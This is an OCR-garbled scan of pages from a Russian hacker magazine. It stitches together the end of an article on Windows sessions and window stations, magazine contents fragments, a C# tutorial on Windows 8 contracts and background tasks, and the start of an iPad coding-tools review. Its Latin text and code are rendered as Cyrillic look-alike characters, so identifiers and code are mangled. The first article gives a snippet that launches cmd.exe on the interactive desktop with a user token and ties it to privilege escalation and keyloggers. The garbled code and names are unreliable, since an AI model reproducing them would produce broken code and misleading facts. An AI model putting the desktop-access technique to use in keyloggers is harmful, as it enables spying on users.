Когда менеджер сервисов (зегѵісез.ехе) создает процесс 
для интерактивного сервиса (сорри за тавтологию), он присо- 
единяет его к \Л/іпзІаО (начальной рабочей станции, о них ниже), 
а не к рабочей станции самого процесса. Чтобы сделать это, про- 
цесс сервиса должен иметь права 5У5ТЕМ, потому что потом ему 
придется взаимодействовать с интерактивным десктопом и самим 
пользователем. Это может привести к очень плачевным резуль- 
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ХАКЕР 03/170/2013 



097 




МАШАРЕ 




Беиюл 

2 




—И 


СЖсолпесі 




-1 ѴѵтЯвО 


шш~ 


_ т 


Оміаооі 


|— Ч 








г г і 










ОеСаиЛ 


1 



Отношения между сессиями, станциями ІЛЛпгіоѵѵв и десктопами \Ѵіп()ож5 



тэтам — атакам на повышение привилегий, основанным на том, 
что интерактивные процессы функционируют в системе с правами 
5Ѵ5ТЕМ и привилегиями «Ігивіесі сотриііпд базе» (ТСВ). 

Изоляция Бѳббіоп 0 может привести к проблеме с сервисами, 
которым необходимо отображение пользовательского интерфейса. 
Поскольку сервис теперь выполняется в другой сессии (по срав- 
нению с десктопом], пользовательский интерфейс не будет виден 
конечным пользователям и интерактивный сервис может оказать- 
ся в «зависшем» состоянии. 

В ѴѴіпсіоѵѵб Ѵізіа решение этой проблемы состоит в том, 
что пользователям предоставляется возможность временного 
переключения в Бѳббіоп 0 для взаимодействия с интерактивным 
сервисом. 

В общем, намудрили товарищи из МісгобоК, не смогли переплю- 
нуть золотое правило: «Если нельзя, но очень хочется, то можно». 



ОСТОРОЖНО, ДВЕРИ ЗАКРЫВАЮТСЯ' ■ 
СЛЕДУЮЩАЯ СТАНЦИЯ... «ѴѴІЫР0ѴѴ5»? 



Да-да, системным кодерам должно быть знакомо понятие 
ѴѴіпсіоѵѵБіаІіоп (СгеаІеѴѴіпсіоѵѵБіаІіопП). Зачем оно нужно? Ну хотя 
бы для того, чтобы всегда иметь в виду, что, если твой код должен 
быть внедрен в системный процесс или сервис (посредством под- 
мены контекста потока), он выполняться не будет из-за несоот- 
ветствия ѴѴіпсІоѵѵБіаІіоп. Потому что у юзермодных приложений 
это будет «\ѴѴіпбоѵѵБ\ѴѴіпбоѵѵ5іаІіоп5\ѴѴіп5іаО», а у системного 
сервиса — «\ѴѴіпсіоѵѵ5\ѴѴіпсІоѵѵ5*аІіоп5\5егѵісе-0х0-Зе7$». Это надо 
обязательно иметь в виду, например при создании кейлоггеров. 

Как можно получить полный доступ к интерактивной рабочей 
станции и десктопу «ѵѵіп5ІаО\\сіе(аиІІ»? Смотрим код: 



ѵѵіпБІіаНапсІІе = ОрепІлІіпсІом51:а1:іоп( 



міп5І:аѲ", 



И^БТА.АССЕББСИРВОАВО | 
ЫІ^ТА_АССЕ55СІ-ОВАІ_АТОМ5 | 
И:Ш5ТА_СКЕАТЕОЕ5КТОР | 
МІ№ТА_ЕМІІМОЕ5КТОР5 | 

ИІ№ТА_ЕМІІМЕКАТЕ | 

МІМ5ТА_ЕХІТМІМ00М5 
ИІМ5ТА_РЕАОАТТРІВІЯЕ5 | 
М:Ш5ТА_КЕА05СВЕЕМ | 

УЯ№ТА_>ІКІТЕАТТКІВІЯЕ5)) ; 



РАІ.5Е, 



5еТРгосеББІ/\Ііпсіоѵѵ5Та1:іоп(ѵі/іп5'1:аНапсІ1е); 
сІе5к1:орНапсІ1е = 0реп^е5к1:ор( ,, сIе■Раи11: , ^ 0, РА1.5Е, 



0Е5КТ0Р_СРЕАТЕМЕМІ | 

ОЕ5КТОР_СВЕАТЕкІІМООІлІ | 

ОЕ5КТОР_ЕМІІМЕВАТЕ | 

ОЕ5КТОР_НО(ЖС(ЖТРОІ- | 

0Е5КТ0Р_301)ВМАІ-Р1-АУВАСК | 

ОЕ5КТОР_ЗОІЖМІ_КЕССЖО | 

ОЕ5КТОР_КЕАООВЗЕСТ5 | 

ОЕ5КТОР_5МІТСРЮЕ5КТОР | 

ОЕ5КТОР_МКІТЕОВЗЕСТ5) ) ; 

2егоМешогу (&5і , 5Ігео-Р(БТАРТІІРІМР0) ) ; 

Бі.сЬ * 5І2ео-Р(БТАКТІІРІМРО); 
бі. ІрОеБк^ор = "міпБТаѲХХсІе-РаиІ^"; 
і-р ( ІСгеаІеРгосеББАБІІБегС 
ЬТокеп, 

N111.1., 

"стсі.ехе", 

мии, 

N1111., 

РА1.5Е, 

Ы0КМАІ_РКІ0КІТУ_СІА55 | СКЕАТЕ_МЕИ_С0М501Е , 
N111.1., 

N111.1.; 

&5І, 

&рі 

)); 

Полный вариант кода ты сможешь найти здесь: Биррогі.ппісгоБоіі. 

сот/кЬ/165194 . 



ПОДЫТОЖИМ... 



Тема сессий, рабочих станций и сервисов в ѴѴіпсіоѵѵб далеко 
не изучена. Уверен, что там, если покопаться хорошенько, не одну 
химеру на свет божий можно будет вытащить. 

В погоне за безопасностью команда ѴѴіпсіоѵѵб хорошенько 
постаралась осложнить жизнь как простым программистам, так 
и малварщикам. С выходом операционок ѴѴіпсіоѵѵб Ѵібіэ и более 
новых начали успешно отваливаться многие коммерческие ѴЫС- 
решения, перестали работать кейлоггеры. И все это — в результате 
попыток изолировать рабочие станции, десктопы и сессии друг 
от друга. 

Засим закончу. Удачного компилирования и да пребудет с то- 
бой Сила! 30 



■4? Рисе ЬфЬэт - 5ум*тКс тм^іум«т*.сопі |У%>7-46-ѴМ_ : о ГбГ 





Единственный 
способ что-то 
сделать вне своей 
терминальной 
сессии — 
это запустить 
отдельный процесс 
в этой сессии 
посредством Сге- 
аІеРгосевзАзЦзег 
с нужным токеном. 



Как всегда, МБйЫ 
тебе в помощь: Ы Ыу/ 
ѴЛ/НхЫіУ. 



Станция Мпсіоѵѵб 
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Ргеѵіеѵѵ 



ІЖІХОЮ 



116 



ОТРЯДЫ СПЕЦИАЛЬНОГО НАЗНАЧЕНИЯ 

Существуют сотни дистрибутивов 
Ыпих: для роутеров, для медиапле- 
еров, для старых машин, для пред- 
ставителей различных профессий 
(например, звукорежиссеров). 

Но далеко не каждая «хотелка» 
в стиле «а давайте-ка сделаем свой 
дистрибутив с ножичками и пионер- 
ками» выливается в качественный, 
удобный и полезный продукт. 

Именно поэтому специально 
для тебя, дорогой читатель, мы 
и решили сделать подборку самых 
полезных дистрибутивов, заточен- 
ных под выполнение конкретной 
задачи. 




ІМІХОШ 



кодинг 
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КРИОГЕННАЯ ИНЖЕНЕРИЯ 

Ребята из РагаІІеІззатеяли интересное 
дело: систему СРЮ, позволяющую замора- 
живать любые процессы. 
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ЮТРЮШРТ? 

И правда. Сколько бы ни стебались над 
восьмеркой, а кому-то для нее придется 
писатьпрограммы. 



104 



ІРАО ДЛЯ РАЗРАБОТЧИКА 

Представляем обзор самых полезных 
приложений для программирования 
наіРасі. 



КОДИНГ 



5УЫ/АСК 
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РОБОТ-ШПИОН — ЭТ0ПР0СТ0! 

Делаем робота на базе конструктора 1.едо 
Міпсізіогтз и среды разработки МісгозоК 


126 


НУЖНО 2АЛАТАТЫ 

Предотвращаем утечку ценной корпора- 
тивной информации средствами пакета 


132 



РоЬоІісз ОеѵеІорегБіисііо. 2есигіоп. 



ВЫВОДИМ НАЧИСТУЮ ВОДУ 

Советы по продвинутому использо- 
ванию инструмента мониторинга 
ѴѴігезЬагк. 



ХАКЕР 03/170/2013 



099 














кодинг 



Юрий «уигетЬо» Язев, ведущий программист компании 6епоте0ате$ (ѵтш.рдепот.ги) 




ПРОДОЛЖАЕМ ВКУРИВАТЬ 
В ПРОГРАММИРОВАНИЕ ДЛЯ ЖШ00Ж5 8 НА С# 



Появившаяся в ѴѴіпсІоѵѵз 8 подсистема ѴѴіпсіоѵѵб 
Рипііте довольно интересна: она расширяет 
круг пользователей, она удобна для использо- 
вания, она ставит новые стандарты в работе 
с информационными устройствами, а также 
предъявляет новые требования к разработке 
приложений. Мы продолжим разбираться в этой 
системе и рассмотрим некоторые особо инте- 
ресные возможности подсистемы ѴѴіпРТ. В духе 
прошлой статьи мы обсудим сразу несколько ме- 
ханизмов новой операционки, узнаем, для чего 
они используются, и научимся применять их 
в своих целях. Время не ждет, поехали! 

КОНТРАКТЫ 

В абстрактном смысле, контракт — это новый способ взаимодей- 
ствия операционной системы с выполняемым в ней приложением. 
Так что в ѴѴіпсІоѵѵз теперь есть единообразный механизм для вза- 
имодействия между операционной системой и любым ѴѴіпсІоѵѵз 
Зіоге приложением. В число контрактов входят: контракт поиска, 
контракт общего доступа, «Параметры», «Запуск и активация 
файлов», «Работа с файловой системой», «Работа с контактами», 



«Кеширование файлов» и другие. Взаимодействие с контрактами 
в ѴѴіпсІоѵѵз Зіоге довольно важно, поскольку «правильные» при- 
ложения теперь должны использовать средства операционной 
системы, а не реализовывать свои механизмы. Это только сыграет 
на руку юзерам, так как предоставит им одинаковый способ 
управления каждой программой. Разберемся с работой некоторых 
контрактов. 

КОНТРАКТ ПОИСКА 

Первый на очереди — контракт поиска. Он предоставляет возмож- 
ность поиска определенного элемента на странице приложения, 
например в том случае, если на ней присутствует длинный список. 
Чтобы воспользоваться контрактом, надо сначала вызвать экс- 
пресс- (или «чудо-», что то же самое] панель, проведя курсором 
по правому краю экрана, затем на ней нажать кнопку «Поиск». 
Экспресс-панель заменится панелью с элементами управления 
для поиска. В подавляющем большинстве ѴѴіпсІоѵѵз Зіоге при- 
ложений, если ввести какую-то фразу и нажать «Поиск», главная 
страница будет заменена результатами поиска. Таким образом, 
для приложения, поддерживающего поиск, надо выполнить 
по большому счету две задачи: включить поддержку поиска и орга- 
низовать страницу результатов. Контракт служит только для реа- 
лизации взаимодействия системной функции поиска с приложени- 
ем, для реализации фактического поиска нужно самостоятельно 
применять определенные для каждого случая средства. Испытаем 
контракт в новом пустом приложении: организуем взаимодействие. 
Для подключения возможности поиска надо перейти в манифест 
приложения на вкладку «Объявления». Из ниспадающего списка 
«Доступные объявления» выбрать «Поиск» и нажать кнопку «До- 
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ѴѴТРѴѴІпРТ? 



бавить». Поддерживаемое объявление появится в соответствую- 
щем списке. Теперь, если вызвать поиск, наше приложение будет 
в списке приложений, поддерживающих эту возможность. Теперь 
добавим страницу, где будут отображаться результаты поиска, 
в нашем простом приложении искать воистину нечего, поэтому мы 
будем отображать на этой странице фразу поиска прямо в ее за- 
головке. Можно кодить страницу для поиска вручную: реализовать 
интерфейс, добавить весь код поддержки поиска, а можно вос- 
пользоваться шаблоном страницы результатов поиска. Последний 
вариант выглядит более предпочтительным. Из контекстного меню 
элемента проекта в обозревателе решений выбери «Добавить-» 
Создать элемент», затем в диалоге выбери «Контракт поиска». 
Будет создана дополнительная страница, а также в проект будут 
добавлены все необходимые зависимости, в том случае, если будет 
утвердительный ответ в диалоге. В файле Арр.хатІ.сз также будет 
обновлено событие ОпБеагсЬАсІіѵаІегі, которое активизируется 
в момент отправки сообщения поиска. Вдобавок есть возможность 
реализовать поиск, происходящий одновременно с вводом текста. 

КОНТРАКТ ОБЩЕГО ДОСТУПА 

Этот контракт предназначен для объединения средств работы 
с информацией. По большому счету он представляет собой старый 
добрый копи-паст, но в обход буфера обмена. То есть он позволяет 
передать информацию от поставщика приемнику, при этом в по- 
ставщике определяется передаваемая информация, а системный 
контракт выбирает из списка установленных приложений то, 
которое способно принять данные этого типа, и по указанию поль- 
зователя передает их выбранной аппликации. Все это происходит 
явно для юзера, позволяя ему не напрягаться для запоминания 
содержимого буфера. К примеру, один из вариантов — реализовать 
это взаимодействие между браузером и клиентом электронной по- 
чты. Только надо запустить \Л/іп5іоге-браузер. Выдели в нем адрес, 
затем вызови экспресс-панель и нажми на ней «Общий доступ». 
Экспресс-панель будет заменена списком приложений, которые 
могут принять данные такого типа, выбери «Почта». Справа в за- 
крепленном режиме появится клиент для отправки почты, в теле 
письма которого будет присутствовать выделенный в браузере 
текст. 

Теперь попробуем реализовать этот контракт в своем прило- 
жении для передачи текста. Для этого надо подготовить постав- 
щик и приемник. Начнем с первого. Для него подойдет пустое 
приложение. Добавь на страницу ТехіВох из панели элементов. 

В этот элемент будем вводить текст, предназначенный для рас- 
шаривания с другим приложением. Для реализации поддержки 
общего доступа к данным в ѴѴіпРТ существует статический класс 
ОаІаТгапз^егОаІа. Если юзер нажимает кнопку общего доступа, 
то в находящемся на экране приложении генерируется событие 
ОаІаРедиезІесІ данного класса. Чтобы наше приложение реагиро- 
вало на это событие, надо его зарегистрировать. Подходящим ме- 
стом для этого является обработчик события опМаѵідаІесіТо класса 
МаіпРаде: тап.ОаІаРедиезІесі += тап_0аІаРедиезІесі;. В данном 
случае тап — это объект класса ОаІаТгапз^егОаІа, относящийся 
к активному приложению, и, чтобы его получить, надо вызвать 
метод БеіРогСиггепіѴіеѵѵ рассматриваемого класса. Предвари- 
тельно в список разрешения типов надо добавить «изіпд ѴѴіпсІоѵѵз. 
АррІісаІіопМосІеІ.ОаІаТгапз^ег;». Вместе с тем, когда страница 
МаіпРаде становится неактивной, реагирование на событие ста- 
новится ненужным, поэтому при уходе с этой страницы в событии 
опІЧаѵідаІебРгот надо удалить зарегистрированное событие «тап. 
ОаІаРедиезІесі -= тап_0аІаРедиезІе(і;». Сейчас нам надо описать 
зарегистрированное событие. Я не буду приводить весь исход- 
ный код, ограничусь кратким описанием (см. исходник на диске, 
проект БиррІіегАрр). Заголовок функции имеет вид: ѵоісі тап_0а* 
аРедиезІесіЮаІаТгапз^егМападег эепсіег, ОаІаРедиезІесіЕѵепіАгдз 
агдз), в теле сначала происходит проверка, чтобы текстовое поле 
не было пустым, затем с помощью метода ОеШеНегаІ происходит 
получение объекта класса ОаІаРедиезІесіОеНегаІ, который ис- 



пользуется для асинхронной передачи данных. Следующей парой 
строк настраиваются параметры передаваемых данных: задается 
заголовок и из поля ввода выбирается текст. На следующем шаге 
данные передаются приложению-приемнику. 

Теперь нам надо разработать этот самый приемник. В качестве 
основы создадим для него пустое приложение. Чтобы приложение 
могло принимать расшаренные данные, необходимо объявить 
об этом в манифесте. В объявлениях надо добавить «Конечное 
приложение». Справа в этой же вкладке развернется список, в ко- 
тором надо задать формат поддерживаемых при передаче данных: 
нажмем кнопку «Добавить»» и в поле ввода введем «Техі», под- 
разумевая, что приложение будет принимать текстовые данные. 
Добавим страницу, на которой будут отображаться передаваемые 
из приложения-источника данные. Естественно, что на этой стра- 
нице понадобится текстовое поле для вывода текстовых данных. 
Когда в приложение поступают расшаренные данные, активизиру- 
ется событие ОпБНагеТагдеіАсІіѵаІесі. В обработчик этого события 
передается объект класса 5ЬагеТагдеіАсІіѵаІесіЕѵепіАгд5, в ко- 
тором инкапсулированы передаваемые данные. Этот обработчик 
стоит описать в файле Арр.хатІ.сз (см. исходник на диске, проект 
РесеіѵегАрр). В нем создается новый фрейм для отображения кон- 
тента страницы и осуществляется переход на страницу, предна- 
значенную для вывода результатов передачи (добавленную ранее). 
Вместе с переходом на другую страницу передаем объект класса 
БЬагеОрегаІіоп, содержащий расшаренные данные объекта класса 
БЬагеТагдеіАсІіѵаІесІЕѵепІАгдз. Затем активируется текущая 
страница. Теперь в событии, происходящем по этому случаю, — 
опІМаѵідаІесіТо надо написать код для вывода данных (см. исходник 
на диске). Во-первых, надо объявить его асинхронным: в заголовок 
метода перед возвращаемым типом данных надо добавить ключе- 
вое слово азупс. В теле, кроме вызова базового метода и проверки 
передаваемого параметра на равенство пиІІ, присутствует код 
для преобразования параметра к типу БЬагеОрегаІіоп — объекту, 
содержащему расшариваемые данные. Далее, если передаваемый 
параметр содержит текст, асинхронно выполняется операция его 
извлечения и вставки в поле ввода. Кроме того, в начало файла 
надо добавить ссылки на пространства имен: 

изіпе Міпгіои5.Арр1ісаТіопМосІе1.0аТаТгап5-Рег; 

изіп§ ілііпсіомз . АррІісаТіопМосІеІ . ОаТаТгапз-Рег . БЬагеТагее*; 

Комплекс приложений готов: откомпилируй, запусти и закрой 
приемник, потом запусти поставщик, введи какой-нибудь текст, 
на экспресс-панели нажми кнопку «Общий доступ», в появившем- 
ся списке окажется наше приложение-приемник, которое можно 
выбрать для принятия данных (рис. 1). 

ДРУГИЕ КОНТРАКТЫ 

Поскольку контракты крайне важный механизм новой версии 
ѴѴіпсІоѵѵз, необходимо разобраться в их работе. К сожалению, рамки 
статьи не резиновые, а нам, кроме контрактов, надо рассмотреть 
другие фичи, поэтому оставшиеся мы разберем поверхностно. 




Рис. 1. Расшаренные данные 
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Рис. 2. Точка входа в фоновый процесс 




Рис. 3. Менеджер ссылок 



Контракт «Параметры» позволяет организовать единую 
для всех приложений систему настроек в общем стиле. Контрак- 
ты для работы с файловой системой мы рассмотрели в прошлой 
статье, к ним относятся РіІеОрепРіскег и РіІеВаѵеРіскег; контракт 
кеширования, как следует из названия, позволяет кешировать 
удаленный контент на локальном устройстве; работа с контактами 
сводится к отображению и использованию контактной инфор- 
мации персоны; контракт запуска и активации файла позволяет 
зарегистрировать приложение для открытия файлов с определен- 
ным разрешением. Замечу, что здесь приведен не полный список 
контрактов, а только самые интересные. 

ВЫПОЛНЕНИЕ ФОНОВЫХ ПРОЦЕССОВ 

В подсистеме ѴѴіпРТ выполняются только находящиеся на пе- 
реднем плане приложения (здесь вам не ѴѴіп32, одновременно 
несколько программ не работает). Как мы обсуждали в прошлой 
статье, если приложение переходит в бэкграунд, оно приоста- 
навливается, а впоследствии, при нехватке ресурсов, удаляется. 

В то же время приложение может иметь выполняющиеся в отдель- 
ных процессах фоновые задачи, файлы, содержащие их код, имеют 
расширение ѵѵіптсі. Однако в ѴѴіпРТ никакой процесс не может 
выполняться неопределенно долго, поэтому в зависимости от от- 
ношения фоновых задач к экрану блокировки они имеют опреде- 
ленное время выполнения на СРІ) и частоту активации. Действи- 
тельно, приложения, которые способны что-то выводить на экран 
блокировки, имеют приоритет перед программами, которые этого 
не могут. 

Теперь давай создадим ѴѴіпРТ-приложение, имеющее фоновую 
задачу. Рамки статьи не позволяют нам разработать мегапрогу, 
ограничимся задачей, реализовать которую можно по-быстрому 
и на коленке. Пусть хост-процесс служит для регистрации и уда- 
ления зарегистрированной фоновой задачи, а последняя будет 
в фоне ожидать появления доступа к интернету и в этот момент 
на тайле хост приложения выводить надпись «Ѵои'ге опііпе». 

Создадим новое пустое приложение, разместим на нем кнопку 
с надписью «Зарегистрировать задачу». Вообще, надпись будет 
зависеть оттого, зарегистрирована задача или нет. Далее добавим 
компонент Мпбоѵѵз Випііте: создадим дополнительный про- 
ект в текущем решении: «Файл -> Добавить — ► Создать проект». 

В открывшемся окне выберем «Компонент среды выполнения 
ѴѴіпсіоѵѵз». В открывшемся сз-файле добавленного проекта надо 
заменить имеющийся класс следующим кодом: 

риЬІіс зеаіесі сіэбб ВТазк: ІВаск§гоипсІТа5к { 

риЫіс ѵоісі Кип(ІВаск§гоипсІТа5кІП5І:апсе іаБкІпБіапсе) { 
ХтЮоситепі {іІеОаіа = Ті1еІ!рсІа1:еМапа§ег .♦-< 
бе^Тетр 1 аІеСопІеп* ( Ті ІеТетр 1а*еТу ре . Ті ІеБциа геТехТ04 ) ; 



ХтІМосІеІ-ІБІ: іехіОаіа = ^іІеОаіа.СеіЕІетепіБВуТа^ате.-' 

(ЧехО; 

гехЮа{а[0] ЛппегТех* = "Ѵои’ге опііпе”; 

ТіІеЫоіібсаііоп поіібсаііоп = пем ТіІеМоіібсаііоп-^ 

(•Шейа^а); 

поіібсаііоп. ЕхрігаТіопТіте = ОаТеТітеО-Р-Рзе'С.ІіісІ^ом.*-' 

АсІсІ5есопсІ5(2Ѳ); 

ТіІеІІрсІа'СеМапаеег.СгеаіеТіІеІІрсІаіегЕогАррІісаііопО 

Іірс1аіе(по'1:ібсаТ:іоп); 

} 

} 

Первое, на что стоит обратить внимание, — класс ВТазк запа- 
кован (зеаіегі), поскольку нельзя экспортировать (в данном случае 
из процесса во время выполнения) незапакованный класс. Вто- 
рое — реализация классом интерфейса ІВаскдгоипсІТазк, посколь- 
ку все классы фоновых задач должны его реализовывать. Этот 
интерфейс предоставляет только один открытый метод— Кип, его 
необходимо реализовать. Этот метод в качестве параметра прини- 
мает собственно экземпляр фоновой задачи. Построчно разберем 
тело метода. В первой строке в виде ХМЬдокумента получаем 
плитку меню «Пуск» хост-приложения. Во второй берем коллекцию 
элементов с именем Іехі из полученного ХМІ_-документа. В третьей 
задаем надпись первому элементу коллекции. Далее создаем 
объект для обновления плитки. Затем устанавливаем временной 
промежуток, по истечении которого вышеуказанная надпись будет 
убрана с плитки. В последней строке метода применяем заданные 
свойства к плитке родительского приложения. 

Чтобы этот код компилировался, надо подключить следующие 
пространства имен: 

изіп§ Иіпсіомб . АррІісаТіопМосІеІ . Васк§гоипсІ; 
изіп§ ИіпсІомБ.Оаіа.ХтІ.Оот; 
и5Іп§ МіпсІомБ.ІІІ.МоіібсаііопБ; 

Первое из них содержит интерфейс ІВаскдгоипсІТазк, во втором 
находятся классы для работы с ХМЬдокументами (и их элемента- 
ми), третье предоставляет классы для взаимодействия с пользова- 
тельским интерфейсом, в данном случае с тайлами. 

Этот фоновый процесс включает весь необходимый код для об- 
новления плитки хост-приложения, однако, пока он не зарегистри- 
рован в системе, управление ему не будет передано. Заполним эту 
пустоту. Создай обработчик события нажатия на кнопку в главной 
программе. Прежде чем его написать, произведем некоторые 
добавления в другие части файла. Во-первых, добавь ссылку 
на пространство имен: изіпд Міпбоѵѵз.АррІісаІіопМосІеІ.Васкдгоипсі; 
во-вторых, в момент запуска приложения мы будем осуществлять 
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проверку регистрации нашей библиотеки, поэтому итог провер- 
ки надо сохранять в переменной. В начале класса объяви булеву 
глобальную переменную «ЬооІ ІавкРед = ^аіве;». Далее напишем 
этот проверочный код, поместим его в отдельном методе, по- 
скольку он будет вызываться не только при появлении приложения 
на экране. Пусть это будет метод ргіѵаіе ѵоісі СЬескТазкРедізІгаІіоп, 
имеющий следующее тело: 

■РогеасЬ(ѵаг Тазк іп ВаскегоипсІТа5кКе§І5І:га1:іоп.А11Та5к5) { 

і-р (1:а5к.Ѵа1ие.№те == "ВТазк") { 

ТазкВее = Тгие; 

Ьгеак; 

} 

} 

ІТ (1:а5кВе§) Ке§Ви*.Соп1:еп1: = "Удалить задачу"; 

еізе і-р (!1а5кВе§) Ке§Ви1: . СопіепТ = "Зарегистрировать «-• 

задачу"; 

Тут мы перебираем список зарегистрированных фоновых за- 
дач текущего приложения, и если имя одной из них совпадает 
с константой ВТазк, значит целевая задача уже зарегистрирована, 
следовательно, переменной ІазкРед присваиваем положитель- 
ное значение, а на кнопке меняем надпись на «Удалить задачу». 

В противном случае надпись на кнопке принимает вид «Зареги- 
стрировать задачу». Эту функцию надо вызвать в начале работы 
приложения, а именно в обработчике события ОпМаѵідаІегіТо. 

Сейчас напишем метод для регистрации фонового процесса, 
назовем его РедізІегВаскдгоипсіТазк. Он получает два строковых 
параметра: имя фоновой задачи и точку входа в процесс, которая 
состоит из пространства имен и класса фоновой задачи, разделен- 
ных точкой. Тело этого метода имеет следующий вид: 

Васк§гоипсІТа5кВиі1сІег Ь*Ь = пем Васк§гоипсІТа5кВиі1сІег(); 
ЬТЬ.Мате = пате; 

ЬТЬ.ТазкЕпТгуРоіпТ = епТгуроіпТ; 

ЬТЬ . БеТТ гі§§ег( пей БузТетТ гі§§ег( Бу 5і:етТгі§ёегТуре . 
ІпТегпеіАѵаіІаЫе, -Раізе)); 

ВаскегоипсІТазкВееізТгаТіоп ііазк = ЬТЬ. Ке§і$1:ег( ); 

Сперва создаем объект, представляющий собой фоновую 
задачу, затем задаем егосвойства: назначаем имя, полученное 
посредством параметра (имя должно соответствовать названию 
проекта фоновой задачи в этом решении), задаем точку входа в за- 
дачу. Следующим действием назначаем событие, по которому будет 
вызываться фоновая задача. Существует четыре типа событий, или 
триггеров, их мы не будем обсуждать в рамках статьи по понят- 
ным причинам (Віпд в помощь); для нашего случая подходит тип 
БузІетЕѵепПпддег (системные события). Таких событий много, 
можно составить целый список (его рассматривать мы тоже не бу- 
дем). Для нашего эксперимента нам нужно событие, возникающее 
при появлении связи с интернетом. Как раз для этого прекрасно 
подходит триггер ІпІегпеіАѵаіІаЫе, указываем его первым аргу- 
ментом конструктора системного триггера. Вторым аргументом 
конструктора является 0 или 1 для индикации того, будет ли задача 
вызвана однажды (при Ігие) или многократно при наступлении 
события (при (аізе). Результат выполнения конструктора, в свою 
очередь, параметром передается методу БеіТгіддег объекта фо- 
новой задачи. Последней строчкой метода регистрируем фоновую 
задачу в системе. 

Следующий метод (ІІпгедізІегВаскдгоипсіТазк), который мы на- 
пишем, удаляет зарегистрированный фоновый процесс из систе- 
мы. После его вызова происходит цикл по всем фоновым задачам, 
зарегистрированным за данным приложением, в целях обнару- 
жить задачу с именем, соответствующим переданному в параме- 
тре. Когда таковое находится, выполняется строчка «Іазк.ѴаІие. 
Упгедізіегіігие);», которая осуществляет удаление регистрацион- 
ной записи текущего процесса из системы. 



Вот мы и вернулись к обработчику нажатия кнопки. В него 
осталось написать только вызовы методов. В его начале если 
переменная ІазкРед равна 0, значит задача не зарегистрирова- 
на и в момент нажатия кнопки надо вызвать метод регистрации 
РедізІегВаскдгоипсіТазк. В своем экземпляре приложения я пере- 
даю ВТазк — имя фоновой задачи и ВТазк. ВТазк — точку входа: 
пространство имен и класс в моем случае называются абсолютно 
одинаково. 

На этом работа с кодом закончена, однако еще надо попросить 
у системы разрешение работать с фоновыми процессами и при- 
вязать фоновую задачу к приложению. Первое осуществляется 
в манифесте приложения: на вкладке «Объявления», в списке «До- 
ступные объявления» выбрать «Фоновые задачи», после нажать 
кнопку «Добавить». В свойствах надо отметить флажок «Систем- 
ное событие», а в поле ввода «Точка входа» написать точку входа, 
в моем случае ВТазк. ВТазк (рис. 2). Для выполнения последнего 
действа надо открыть менеджер ссылок (Проект -► Добавить 
ссылку...). В появившемся окне на закладке «Решение — ► Проекты» 
(открывается автоматом), отметить галкой имя фоновой задачи — 
ВТазк (рис. 3). 

Протестировать работу приложения и фонового процесса можно 
так: построй оба проекта в решении, вызови на выполнение при- 
ложение, в нем нажми кнопку «Зарегистрировать задачу», потом 
можешь поэкспериментировать с кнопкой и надписью на ней, 
по желанию можешь закрыть приложение. Далее подключись 
к интернету или разорви и восстанови подключение, если сидишь 
в нем всегда :). Открой меню «Пуск», когда соединение восстано- 
вится, на тайле нашего приложения на 20 секунд появится надпись 
«Ѵои’ге опііпе» (рис. 4). 

Кроме того, есть возможность зарегистрировать дополнитель- 
ные события, срабатывающие, когда фоновая задача выполнилась 
и во время работы задачи, например для отображения прогресса. 

ПОДВОДЯ итоги 

На этой ноте мы завершаем обсуждение очередной порции фич, 
содержащихся в ѴѴіпРТ, а вместе с тем и в ѴѴіпсІоѵѵз 8. В статье мы 
рассмотрели механизм контрактов — новый способ взаимодей- 
ствия операционной системы с приложениями, представляющий 
интуитивно понятное управление для пользователей. В рамках 
этой темы были подробно разобраны два контракта: поиска 
и общего доступа — и разработаны три приложения: одно реали- 
зующее поиск и два показывающие средство общего доступа — 
поставщика и приемника информации. 

В следующей части статьи мы обсудили выполнение процес- 
сов в подсистеме ѴѴіпРТ, отметили разницу с классической ѴѴіп32, 
а львиную долю раздела посвятили разработке фонового процесса 
и приложения, выполняющего его регистрацию в системе. Без- 
условно, это далеко не полный список фич, входящих в МпРТ, 
но рамки статьи не позволили обсудить другие темы. Вместе 
с этим я считаю, что вооружившись сведениями из этой и прошлой 
статей, ты можешь дальше копать ѴѴіпРТ самостоятельно. Удачи во 
всех делах! ю 




ВЯЗ 

Все разработанные 
проекты ждут тебя 
на нашем диске. 



Рис. 4. Обновленный тайл 
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Игорь «5ріс1ег_МЕТ» Антонов (апІопоѵ.ідог.кМЭдтаіІ.сот, ѵг-опііпе.ги) 





ПРЕВРАЩАЕМ ІРАй 
В ПОЧТИ ПОЛНОЦЕННЫЙ 
ИНСТРУМЕНТ 
РАЗРАБОТЧИКА 




Что айпад создан для того, чтобы читать журналы, 
смотреть кино, клипы про котиков и ставить лайки 
со чмаксиками, ты понимаешь слишком поздно. Обыч- 
но уже после его покупки. Мысль, что в какое-нибудь 
путешествие все равно придется брать ультрабук 
(вместе с камерой, фотиком, айпадом и телефоном), 
тягостна и заставляет проработать тему адаптации 
айпада к нетипичной для него роли — инструмента 
для генерации, а не потребления цифрового контента. 



ОЦЕНИВАЕМ МАСШТАБЫ РАЗРУШЕНИЙ 

Любителям иметь на своей железке С++/РуіНоп/І_АМР и прочие прелести 
большого десктопного мира іРасі точно рад не будет. Поднять на планшете 
компилятор С++ или интерпретатор питона без грязного джейлбрейка (см. 
врезку) не удастся. 

Больше всего профита от законопослушно используемого айпадика име- 
ют веб-разработчики. Именно им под силу выжать максимум от разработки 



на планшете. В связи с этим все дальнейшие советы будут 
в большей степени ориентированы именно на них. 

АПГРЕЙД КЛАВИАТУРЫ 

Какой может быть кодинг без правильного инструмента на- 
бора текста? Если ты надеялся обойтись экранной клавиату- 
рой, то ты крайне наивен — она совершенно не подходит для 
работы с текстом и тем более кодом. Конечно, ваш покорный 
слуга умудрялся колбасить на ней статьи по 18 кил знаков (и 
задерживать минимум на две недели! — Прим, ред.), но по- 
вторять этот опыт я не советую никому. Она не дает тактиль- 
ного отклика, на ней нельзя печатать вслепую, она отъе- 
дает дисплейное пространство, и на ней нет совершенно 
необходимых программеру клавиш быстрого перемещения 
по тексту вроде стрелочек и табуляции. Поэтому обзаведись 
отдельной, хардварной клавиатурой! Которая к тому же 
может выполнять функции чехла. 

Могу поделиться личным опытом — мне исправно служит 
клавиатура БодіІесЬ ШгаіЫп КеуЬоагсІ Соѵегза три тысячи 
рублей. Но это лишь один из многих вариантов. 

Итак, закончили приготовления — давай посмотрим на 
героев сегодняшнего обзора. 
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іРагі для программиста 



Тех^азііс Сосіе Есіііог 

Арр Біоге: аоо.оІ/хѴКпТ 



Техіавііс — профессиональный текстовый редактор, обладающий всем необходимым 
